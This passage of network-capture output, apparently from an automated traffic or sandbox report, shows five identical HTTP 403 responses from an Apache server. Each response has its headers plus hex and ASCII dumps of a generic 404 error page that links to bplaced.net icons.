                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" h
                                                                                                                                                Sep 29, 2022 14:50:44.188249111 CEST14486INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:44 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:45.187611103 CEST14494INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:45 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=114
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:46.162333012 CEST14502INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:46 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:47.123119116 CEST14510INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:47 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=106
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:48.183430910 CEST14518INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:48 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=111
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
